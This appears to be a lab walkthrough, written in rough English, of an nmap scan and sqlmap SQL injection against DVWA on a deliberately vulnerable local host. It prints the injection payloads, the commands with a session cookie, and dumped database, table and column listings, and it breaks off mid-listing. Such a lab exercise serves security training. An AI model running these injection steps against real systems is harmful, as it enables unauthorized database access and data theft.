root@bt:/pentest/database/sqlmap# nmap 192.168.56.101
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-26 21:54 WIT
Nmap scan report for 192.168.56.101
Host is up (0.00046s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
completed scans continue to know databases, with a command like the following:
=>http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#
dvwa address that is in the browser, notice before
=>security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab
the address out of proxie burp suite, note the burp suite before
Select 1 [1] Follow the redirection (default) view databases as a whole.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab" --dbs
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 03:46:43
[03:46:43] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[03:46:43] [INFO] resuming injection data from session file
[03:46:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:46:43] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit
---
[03:46:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:46:43] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195
[03:46:43] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'
[*] shutting down at 03:46:43
continue with doing such a command below, to find out the data that is in tables, select 1-> [1] Follow the redirection (the
default) to view the data contained in the tables as a whole:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab" -D tikiwiki --tables
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 03:51:21
[03:51:22] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[03:51:22] [INFO] resuming injection data from session file
[03:51:22] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:51:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit
---
[03:51:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:51:22] [INFO] fetching tables for database: tikiwiki
Database: tikiwiki
[194 tables]
+------------------------------------+
| galaxia_activities |
| galaxia_activity_roles |
| galaxia_instance_activities |
| galaxia_instance_comments |
| galaxia_instances |
| galaxia_processes |
| galaxia_roles |
| galaxia_transitions |
| galaxia_user_roles |
| galaxia_workitems |
| messu_archive |
| messu_messages |
| messu_sent |
| sessions |
| tiki_actionlog |
| tiki_article_types |
| tiki_articles |
| tiki_banners |
| tiki_banning |
| tiki_banning_sections |
| tiki_blog_activity |
| tiki_blog_posts |
| tiki_blog_posts_images |
| tiki_blogs |
| tiki_calendar_categories |
| tiki_calendar_items |
| tiki_calendar_locations |
| tiki_calendar_roles |
| tiki_calendars |
| tiki_categories |
| tiki_categorized_objects |
| tiki_category_objects |
| tiki_category_sites |
| tiki_chart_items |
| tiki_charts |
| tiki_charts_rankings |
| tiki_charts_votes |
| tiki_chat_channels |
| tiki_chat_messages |
| tiki_chat_users |
| tiki_comments |
| tiki_content |
| tiki_content_templates |
| tiki_content_templates_sections |
| tiki_cookies |
| tiki_copyrights |
| tiki_directory_categories |
| tiki_directory_search |
| tiki_directory_sites |
| tiki_download |
| tiki_drawings |
| tiki_dsn |
| tiki_dynamic_variables |
| tiki_eph |
| tiki_extwiki |
| tiki_faq_questions |
| tiki_faqs |
| tiki_featured_links |
| tiki_file_galleries |
| tiki_file_handlers |
| tiki_files |
| tiki_forum_attachments |
| tiki_forum_reads |
| tiki_forums |
| tiki_forums_queue |
| tiki_forums_reported |
| tiki_friends |
| tiki_friendship_requests |
| tiki_galleries |
| tiki_galleries_scales |
| tiki_games |
| tiki_group_inclusion |
| tiki_history |
| tiki_hotwords |
| tiki_html_pages |
| tiki_html_pages_dynamic_zones |
| tiki_images |
| tiki_images_data |
| tiki_integrator_reps |
| tiki_integrator_rules |
| tiki_language |
| tiki_languages |
| tiki_link_cache |
| tiki_links |
| tiki_live_support_events |
| tiki_live_support_message_comments |
| tiki_live_support_messages |
| tiki_live_support_modules |
| tiki_live_support_operators |
| tiki_live_support_requests |
| tiki_logs |
| tiki_mail_events |
| tiki_mailin_accounts |
| tiki_menu_languages |
| tiki_menu_options |
| tiki_menus |
| tiki_minical_events |
| tiki_minical_topics |
| tiki_modules |
| tiki_newsletter_groups |
| tiki_newsletter_subscriptions |
| tiki_newsletters |
| tiki_newsreader_marks |
| tiki_newsreader_servers |
| tiki_object_ratings |
| tiki_page_footnotes |
| tiki_pages |
| tiki_pageviews |
| tiki_poll_objects |
| tiki_poll_options |
| tiki_polls |
| tiki_preferences |
| tiki_private_messages |
| tiki_programmed_content |
| tiki_quicktags |
| tiki_quiz_question_options |
| tiki_quiz_questions |
| tiki_quiz_results |
| tiki_quiz_stats |
| tiki_quiz_stats_sum |
| tiki_quizzes |
| tiki_received_articles |
| tiki_received_pages |
| tiki_referer_stats |
| tiki_related_categories |
| tiki_rss_feeds |
| tiki_rss_modules |
| tiki_score |
| tiki_search_stats |
| tiki_searchindex |
| tiki_searchsyllable |
| tiki_searchwords |
| tiki_secdb |
| tiki_semaphores |
| tiki_sent_newsletters |
| tiki_sessions |
| tiki_sheet_layout |
| tiki_sheet_values |
| tiki_sheets |
| tiki_shoutbox |
| tiki_shoutbox_words |
| tiki_stats |
| tiki_structure_versions |
| tiki_structures |
| tiki_submissions |
| tiki_suggested_faq_questions |
| tiki_survey_question_options |
| tiki_survey_questions |
| tiki_surveys |
| tiki_tags |
| tiki_theme_control_categs |
| tiki_theme_control_objects |
| tiki_theme_control_sections |
| tiki_topics |
| tiki_tracker_fields |
| tiki_tracker_item_attachments |
| tiki_tracker_item_comments |
| tiki_tracker_item_fields |
| tiki_tracker_items |
| tiki_tracker_options |
| tiki_trackers |
| tiki_translated_objects |
| tiki_untranslated |
| tiki_user_answers |
| tiki_user_answers_uploads |
| tiki_user_assigned_modules |
| tiki_user_bookmarks_folders |
| tiki_user_bookmarks_urls |
| tiki_user_mail_accounts |
| tiki_user_menus |
| tiki_user_modules |
| tiki_user_notes |
| tiki_user_postings |
| tiki_user_preferences |
| tiki_user_quizzes |
| tiki_user_taken_quizzes |
| tiki_user_tasks |
| tiki_user_tasks_history |
| tiki_user_votings |
| tiki_user_watches |
| tiki_userfiles |
| tiki_userpoints |
| tiki_users |
| tiki_users_score |
| tiki_webmail_contacts |
| tiki_webmail_messages |
| tiki_wiki_attachments |
| tiki_zones |
| users_grouppermissions |
| users_groups |
| users_objectpermissions |
| users_permissions |
| users_usergroups |
| users_users |
+------------------------------------+
[03:51:22] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'
Now we proceed with dump columns, here we want to see the columns in the tables of tikiwiki, do step as before, see the following:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab" -D tikiwiki --columns
| name | varchar(30) |
| refresh | int(6) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_galleries_scales
[2 columns]
+-----------+---------+
| Column | Type |
+-----------+---------+
| galleryId | int(14) |
| scale | int(11) |
+-----------+---------+
Database: tikiwiki
Table: sessions
[4 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| data | text |
| expireref | varchar(64) |
| expiry | int(11) unsigned |
| sesskey | char(32) |
+-----------+------------------+
Database: tikiwiki
Table: tiki_quiz_stats_sum
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| avgavg | decimal(5,2) |
| avgpoints | decimal(5,2) |
| avgtime | decimal(5,2) |
| quizId | int(10) |
| quizName | varchar(255) |
| timesTaken | int(10) |
+------------+--------------+
Database: tikiwiki
Table: tiki_charts_votes
[4 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| chartId | int(14) |
| itemId | int(14) |
| timestamp | int(14) |
| user | varchar(40) |
+-----------+-------------+
Database: tikiwiki
Table: tiki_newsletters
[12 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| allowAnySub | char(1) |
| allowUserSub | char(1) |
| created | int(14) |
| description | text |
| editions | int(10) |
| frequency | int(14) |
| lastSent | int(14) |
| name | varchar(200) |
| nlId | int(12) |
| unsubMsg | char(1) |
| users | int(10) |
| validateAddr | char(1) |
+--------------+--------------+
Database: tikiwiki
Table: tiki_webmail_contacts
[6 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| contactId | int(12) |
| email | varchar(250) |
| firstName | varchar(80) |
| lastName | varchar(80) |
| nickname | varchar(200) |
| user | varchar(40) |
+-----------+--------------+
Database: tikiwiki
Table: tiki_programmed_content
[4 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| contentId | int(8) |
| data | text |
| pId | int(8) |
| publishDate | int(14) |
+-------------+---------+
Database: tikiwiki
Table: tiki_searchsyllable
[3 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| lastUpdated | int(11) |
| lastUsed | int(11) |
| syllable | varchar(80) |
+-------------+-------------+
Database: tikiwiki
Table: tiki_category_sites
[2 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| categId | int(10) |
| siteId | int(14) |
+---------+---------+
Database: tikiwiki
Table: tiki_zones
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| zone | varchar(40) |
+--------+-------------+
Database: tikiwiki
Table: tiki_faqs
[7 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| canSuggest | char(1) |
| created | int(14) |
| description | text |
| faqId | int(10) |
| hits | int(8) |
| questions | int(5) |
| title | varchar(200) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_chart_items
[9 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| average | decimal(4,2) |
| chartId | int(14) |
| created | int(14) |
| description | text |
| itemId | int(14) |
| points | int(14) |
| title | varchar(250) |
| URL | varchar(250) |
| votes | int(14) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_user_preferences
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| prefName | varchar(40) |
| user | varchar(40) |
| value | varchar(250) |
+----------+--------------+
Database: tikiwiki
Table: tiki_surveys
[7 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| created | int(14) |
| description | text |
| lastTaken | int(14) |
| name | varchar(200) |
| status | char(1) |
| surveyId | int(12) |
| taken | int(10) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_theme_control_objects
[4 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| name | varchar(250) |
| objId | varchar(250) |
| theme | varchar(250) |
| type | varchar(250) |
+--------+--------------+
Database: tikiwiki
Table: messu_sent
[15 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| body | text |
| date | int(14) |
| hash | varchar(32) |
| isFlagged | char(1) |
| isRead | char(1) |
| isReplied | char(1) |
| msgId | int(14) |
| priority | int(2) |
| replyto_hash | varchar(32) |
| subject | varchar(255) |
| user | varchar(40) |
| user_bcc | text |
| user_cc | text |
| user_from | varchar(40) |
| user_to | text |
+--------------+--------------+
Database: tikiwiki
Table: tiki_untranslated
[3 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| id | int(14) |
| lang | char(16) |
| source | tinyblob |
+--------+----------+
Database: tikiwiki
Table: tiki_search_stats
[2 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| hits | int(10) |
| term | varchar(50) |
+--------+-------------+
Database: tikiwiki
Table: tiki_dsn
[3 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| dsn | varchar(255) |
| dsnId | int(12) |
| name | varchar(200) |
+--------+--------------+
Database: tikiwiki
Table: tiki_banning
[13 columns]
+-----------+-------------------+
| Column | Type |
+-----------+-------------------+
| banId | int(12) |
| created | int(14) |
| date_from | timestamp |
| date_to | timestamp |
| ip1 | char(3) |
| ip2 | char(3) |
| ip3 | char(3) |
| ip4 | char(3) |
| message | text |
| mode | enum('user','ip') |
| title | varchar(200) |
| use_dates | char(1) |
| user | varchar(40) |
+-----------+-------------------+
Database: tikiwiki
Table: tiki_preferences
[2 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| name | varchar(40) |
| value | text |
+--------+-------------+
Database: tikiwiki
Table: tiki_comments
[20 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| average | decimal(8,4) |
| comment_rating | tinyint(2) |
| commentDate | int(14) |
| data | text |
| hash | varchar(32) |
| hits | int(8) |
| in_reply_to | varchar(250) |
| message_id | varchar(250) |
| object | varchar(255) |
| objectType | varchar(32) |
| parentId | int(14) |
| points | decimal(8,2) |
| smiley | varchar(80) |
| summary | varchar(240) |
| threadId | int(14) |
| title | varchar(100) |
| type | char(1) |
| user_ip | varchar(15) |
| userName | varchar(40) |
| votes | int(8) |
+----------------+--------------+
Database: tikiwiki
Table: tiki_received_pages
[8 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| comment | varchar(200) |
| data | longblob |
| description | varchar(200) |
| pageName | varchar(160) |
| receivedDate | int(14) |
| receivedFromSite | varchar(200) |
| receivedFromUser | varchar(200) |
| receivedPageId | int(14) |
+------------------+--------------+
Database: tikiwiki
Table: tiki_extwiki
[3 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| extwiki | varchar(255) |
| extwikiId | int(12) |
| name | varchar(200) |
+-----------+--------------+
Database: tikiwiki
Table: tiki_rss_modules
[9 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| content | longblob |
| description | text |
| lastUpdated | int(14) |
| name | varchar(30) |
| refresh | int(8) |
| rssId | int(8) |
| showPubDate | char(1) |
| showTitle | char(1) |
| url | varchar(255) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_calendars
[13 columns]
+--------------------+---------------+
| Column | Type |
+--------------------+---------------+
| calendarId | int(14) |
| created | int(14) |
| customcategories | enum('n','y') |
| customlanguages | enum('n','y') |
| customlocations | enum('n','y') |
| customparticipants | enum('n','y') |
| custompriorities | enum('n','y') |
| customsubscription | enum('n','y') |
| description | varchar(255) |
| lastmodif | int(14) |
| name | varchar(80) |
| personal | enum('n','y') |
| user | varchar(40) |
+--------------------+---------------+
Database: tikiwiki
Table: tiki_live_support_events
[7 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| data | text |
| eventId | int(14) |
| reqId | varchar(32) |
| senderId | varchar(32) |
| seqId | int(14) |
| timestamp | int(14) |
| type | varchar(40) |
+-----------+-------------+
Database: tikiwiki
Table: tiki_blog_posts_images
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| data | longblob |
| filename | varchar(80) |
| filesize | int(14) |
| filetype | varchar(80) |
| imgId | int(14) |
| postId | int(14) |
+----------+-------------+
Database: tikiwiki
Table: tiki_pages
[23 columns]
+-----------------+------------------+
| Column | Type |
+-----------------+------------------+
| cache | longtext |
| cache_timestamp | int(14) |
| comment | varchar(200) |
| created | int(14) |
| creator | varchar(200) |
| data | text |
| description | varchar(200) |
| flag | char(1) |
| hits | int(8) |
| ip | varchar(15) |
| is_html | tinyint(1) |
| lang | varchar(16) |
| lastModif | int(14) |
| lockedby | varchar(200) |
| page_id | int(14) |
| page_size | int(10) unsigned |
| pageName | varchar(160) |
| pageRank | decimal(4,3) |
| points | int(8) |
| user | varchar(40) |
| version | int(8) |
| votes | int(8) |
| wiki_cache | int(10) |
+-----------------+------------------+
Database: tikiwiki
Table: tiki_poll_objects
[3 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| catObjectId | int(11) |
| pollId | int(11) |
| title | varchar(255) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_forum_attachments
[11 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| attId | int(14) |
| created | int(14) |
| data | longblob |
| dir | varchar(200) |
| filename | varchar(250) |
| filesize | int(12) |
| filetype | varchar(250) |
| forumId | int(14) |
| path | varchar(250) |
| qId | int(14) |
| threadId | int(14) |
+----------+--------------+
Database: tikiwiki
Table: tiki_categories
[5 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| categId | int(12) |
| description | varchar(250) |
| hits | int(8) |
| name | varchar(100) |
| parentId | int(12) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_quizzes
[37 columns]
+------------------------+--------------+
| Column | Type |
+------------------------+--------------+
| bAdditionalQuestions | char(1) |
| bDeleted | char(1) |
| bForum | char(1) |
| bLimitQuestionsPerPage | char(1) |
| bMultiSession | char(1) |
| bOnline | char(1) |
| bRandomQuestions | char(1) |
| canRepeat | char(1) |
| created | int(14) |
| description | text |
| expireDate | int(14) |
| immediateFeedback | char(1) |
| name | varchar(255) |
| nAuthor | int(4) |
| nCanRepeat | tinyint(4) |
| nLimitQuestionsPerPage | tinyint(4) |
| nRandomQuestions | tinyint(4) |
| nVersion | int(4) |
| passingperct | int(4) |
| publishDate | int(14) |
| questionsPerPage | int(4) |
| quizId | int(10) |
| sData | text |
| sEpilogue | text |
| sForum | varchar(80) |
| sGradingMethod | varchar(80) |
| showAnswers | char(1) |
| shuffleAnswers | char(1) |
| shuffleQuestions | char(1) |
| sPrologue | text |
| sPublishStats | varchar(80) |
| sShowCorrectAnswers | varchar(80) |
| sShowScore | varchar(80) |
| storeResults | char(1) |
| taken | int(10) |
| timeLimit | int(14) |
| timeLimited | char(1) |
+------------------------+--------------+
Database: tikiwiki
Table: tiki_userpoints
[3 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| points | decimal(8,2) |
| user | varchar(40) |
| voted | int(8) |
+--------+--------------+
Database: tikiwiki
Table: tiki_user_answers
[4 columns]
+--------------+---------+
| Column | Type |
+--------------+---------+
| optionId | int(10) |
| questionId | int(10) |
| quizId | int(10) |
| userResultId | int(10) |
+--------------+---------+
Database: tikiwiki
Table: tiki_suggested_faq_questions
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| answer | text |
| created | int(14) |
| faqId | int(10) |
| question | text |
| sfqId | int(10) |
| user | varchar(40) |
+----------+-------------+
Database: tikiwiki
Table: tiki_integrator_reps
[9 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| cacheable | char(1) |
| css_file | varchar(255) |
| description | text |
| expiration | int(11) |
| name | varchar(255) |
| path | varchar(255) |
| repID | int(11) |
| start_page | varchar(255) |
| visibility | char(1) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_html_pages_dynamic_zones
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| content | text |
| pageName | varchar(40) |
| type | char(2) |
| zone | varchar(80) |
+----------+-------------+
Database: tikiwiki
Table: tiki_minical_topics
[9 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| data | longblob |
| filename | varchar(200) |
| filesize | varchar(200) |
| filetype | varchar(200) |
| isIcon | char(1) |
| name | varchar(250) |
| path | varchar(250) |
| topicId | int(12) |
| user | varchar(40) |
+----------+--------------+
Database: tikiwiki
Table: tiki_banners
[29 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| alt | varchar(250) |
| bannerId | int(12) |
| clicks | int(8) |
| client | varchar(200) |
| created | int(14) |
| fixedURLData | varchar(255) |
| fri | char(1) |
| fromDate | int(14) |
| hourFrom | varchar(4) |
| hourTo | varchar(4) |
| HTMLData | text |
| imageData | longblob |
| imageName | varchar(100) |
| imageType | varchar(200) |
| impressions | int(8) |
| maxImpressions | int(8) |
| mon | char(1) |
| sat | char(1) |
| sun | char(1) |
| textData | text |
| thu | char(1) |
| title | varchar(255) |
| toDate | int(14) |
| tue | char(1) |
| url | varchar(255) |
| useDates | char(1) |
| wed | char(1) |
| which | varchar(50) |
| zone | varchar(40) |
+----------------+--------------+
Database: tikiwiki
Table: tiki_related_categories
[2 columns]
+-----------+---------+
| Column | Type |
+-----------+---------+
| categId | int(10) |
| relatedTo | int(10) |
+-----------+---------+
Database: tikiwiki
Table: tiki_user_taken_quizzes
[2 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| quizId | varchar(255) |
| user | varchar(40) |
+--------+--------------+
Database: tikiwiki
Table: tiki_users_score
[4 columns]
+----------+-----------+
| Column | Type |
+----------+-----------+
| event_id | char(40) |
| expire | int(14) |
| tstamp | timestamp |
| user | char(40) |
+----------+-----------+
Database: tikiwiki
Table: tiki_calendar_locations
[4 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| calendarId | int(14) |
| callocId | int(14) |
| description | blob |
| name | varchar(255) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_cookies
[2 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| cookie | text |
| cookieId | int(10) |
+----------+---------+
Database: tikiwiki
Table: tiki_forums_queue
[13 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| data | text |
| forumId | int(14) |
| hash | varchar(32) |
| object | varchar(32) |
| parentId | int(14) |
| qId | int(14) |
| summary | varchar(240) |
| timestamp | int(14) |
| title | varchar(240) |
| topic_smiley | varchar(80) |
| topic_title | varchar(240) |
| type | varchar(60) |
| user | varchar(40) |
+--------------+--------------+
Database: tikiwiki
Table: users_grouppermissions
[3 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupName | varchar(255) |
| permName | varchar(30) |
| value | char(1) |
+-----------+--------------+
Database: tikiwiki
Table: tiki_drawings
[7 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| drawId | int(12) |
| filename_draw | varchar(250) |
| filename_pad | varchar(250) |
| name | varchar(250) |
| timestamp | int(14) |
| user | varchar(40) |
| version | int(8) |
+---------------+--------------+
Database: tikiwiki
Table: tiki_tracker_fields
[12 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| fieldId | int(12) |
| isHidden | char(1) |
| isMain | char(1) |
| isMandatory | char(1) |
| isPublic | char(1) |
| isSearchable | char(1) |
| isTblVisible | char(1) |
| name | varchar(255) |
| options | text |
| position | int(4) |
| trackerId | int(12) |
| type | char(1) |
+--------------+--------------+
Database: tikiwiki
Table: tiki_chat_users
[3 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| channelId | int(8) |
| nickname | varchar(200) |
| timestamp | int(14) |
+-----------+--------------+
Database: tikiwiki
Table: tiki_content_templates
[4 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| content | longblob |
| created | int(14) |
| name | varchar(200) |
| templateId | int(10) |
+------------+--------------+
Database: tikiwiki
Table: tiki_poll_options
[5 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| optionId | int(8) |
| pollId | int(8) |
| position | int(4) |
| title | varchar(200) |
| votes | int(8) |
+----------+--------------+
Database: tikiwiki
Table: tiki_blog_activity
[3 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| blogId | int(8) |
| day | int(14) |
| posts | int(8) |
+--------+---------+
Database: tikiwiki
Table: tiki_mailin_accounts
[17 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| account | varchar(50) |
| accountId | int(12) |
| active | char(1) |
| anonymous | char(1) |
| article_topicId | int(4) |
| article_type | varchar(50) |
| attachments | char(1) |
| discard_after | varchar(255) |
| pass | varchar(100) |
| pop | varchar(255) |
| port | int(4) |
| smtp | varchar(255) |
| smtpPort | int(4) |
| type | varchar(40) |
| useAuth | char(1) |
| user | varchar(40) |
| username | varchar(100) |
+-----------------+--------------+
Database: tikiwiki
Table: tiki_logs
[7 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| logclient | text |
| logId | int(8) |
| logip | varchar(200) |
| logmessage | text |
| logtime | int(14) |
| logtype | varchar(20) |
| loguser | varchar(40) |
+------------+--------------+
Database: tikiwiki
Table: tiki_live_support_modules
[2 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| modId | int(4) |
| name | varchar(90) |
+--------+-------------+
Database: tikiwiki
Table: tiki_directory_search
[2 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| hits | int(14) |
| term | varchar(250) |
+--------+--------------+
Database: tikiwiki
Table: tiki_tags
[11 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| comment | varchar(200) |
| data | longblob |
| description | varchar(200) |
| flag | char(1) |
| hits | int(8) |
| ip | varchar(15) |
| lastModif | int(14) |
| pageName | varchar(160) |
| tagName | varchar(80) |
| user | varchar(40) |
| version | int(8) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_live_support_messages
[12 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| assigned_to | varchar(200) |
| data | text |
| email | varchar(250) |
| module | int(4) |
| msgId | int(12) |
| priority | int(2) |
| resolution | varchar(100) |
| status | char(1) |
| timestamp | int(14) |
| title | varchar(200) |
| user | varchar(40) |
| username | varchar(200) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_tracker_item_fields
[3 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| fieldId | int(12) |
| itemId | int(12) |
| value | text |
+---------+---------+
Database: tikiwiki
Table: tiki_searchwords
[2 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| searchword | varchar(80) |
| syllable | varchar(80) |
+------------+-------------+
Database: tikiwiki
Table: tiki_webmail_messages
[6 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| accountId | int(12) |
| isFlagged | char(1) |
| isRead | char(1) |
| isReplied | char(1) |
| mailId | varchar(255) |
| user | varchar(40) |
+-----------+--------------+
Database: tikiwiki
Table: tiki_languages
[2 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| lang | char(16) |
| language | varchar(255) |
+----------+--------------+
Database: tikiwiki
Table: tiki_user_assigned_modules
[5 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| name | varchar(200) |
| ord | int(4) |
| position | char(1) |
| type | char(1) |
| user | varchar(40) |
+----------+--------------+
Database: tikiwiki
Table: tiki_live_support_message_comments
[4 columns]
+-----------+---------+
| Column | Type |
+-----------+---------+
| cId | int(12) |
| data | text |
| msgId | int(12) |
| timestamp | int(14) |
+-----------+---------+
Database: tikiwiki
Table: galaxia_roles
[5 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| description | text |
| lastModif | int(14) |
| name | varchar(80) |
| pId | int(14) |
| roleId | int(14) |
+-------------+-------------+
Database: tikiwiki
Table: tiki_content
[2 columns]
+-------------+--------+
| Column | Type |
+-------------+--------+
| contentId | int(8) |
| description | text |
+-------------+--------+
Database: tikiwiki
Table: tiki_menus
[4 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| description | text |
| menuId | int(8) |
| name | varchar(200) |
| type | char(1) |
+-------------+--------------+
Database: tikiwiki
Table: tiki_live_support_operators
[11 columns]
+-------------------+-------------+
| Column | Type |
+-------------------+-------------+
| accepted_requests | int(10) |
| average_chat | int(10) |
| last_chat | int(14) |
| longest_chat | int(10) |
| points | int(10) |
| shortest_chat | int(10) |
| status | varchar(20) |
| status_since | int(14) |
